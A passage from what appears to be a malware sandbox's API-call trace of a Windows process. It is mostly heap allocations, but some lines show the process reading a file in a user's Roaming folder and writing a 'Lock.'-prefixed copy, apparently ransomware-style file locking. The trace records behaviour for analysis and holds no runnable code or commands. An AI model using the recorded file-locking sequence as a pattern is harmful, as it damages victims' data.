lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0199.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.548] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.548] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.548] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.549] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.549] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.549] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.550] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.550] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Ie7x9Fbl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ie7x9fbl.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0199.551] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.551] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0199.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0199.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.552] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.553] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0199.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0199.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.Ie7x9Fbl.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.ie7x9fbl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0199.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0199.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.555] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0199.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0199.563] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0199.563] ReadFile (in: hFile=0x2c0, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0199.565] ReadFile (in: hFile=0x2c0, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x68c3, lpOverlapped=0x0) returned 1 [0199.565] ReadFile (in: hFile=0x2c0, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0199.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x168c3) returned 0x24d7a58 [0199.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0199.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0199.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x168c3) returned 0x34b2250 [0199.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0199.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.571] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x168c3) returned 0x24d7a58 [0199.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0199.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.578] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0199.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0199.579] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.579] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0199.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0199.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x168c3) returned 0x24d7a58 [0199.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: 